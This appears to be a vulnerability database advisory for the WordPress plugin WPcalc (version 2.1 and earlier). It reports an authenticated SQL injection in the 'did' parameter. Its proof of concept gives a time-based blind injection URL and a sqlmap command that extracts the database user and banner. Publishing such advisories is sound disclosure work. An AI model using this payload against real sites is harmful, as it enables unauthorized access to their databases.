WordPress Plugin Vulnerabilities

WPcalc <= 2.1 - Authenticated SQL Injection

Description

The plugin does not sanitize user input supplied in the 'did' parameter before using it in a SQL statement, leading to an authenticated SQL injection vulnerability.

The plugin author closed the plugin.

Proof of Concept

http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND (SELECT 7156 FROM (SELECT(SLEEP(5)))MIkl)

or, using the sqlmap tool:

./sqlmap.py -r request.txt --dbms=mysql --current-user -b -p did --batch --flush-session

Affects Plugins

No known fix

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
0xdecafbad
Verified
Yes

Timeline

Publicly Published
2021-12-06 (about 2 years ago)
Added
2021-12-09 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)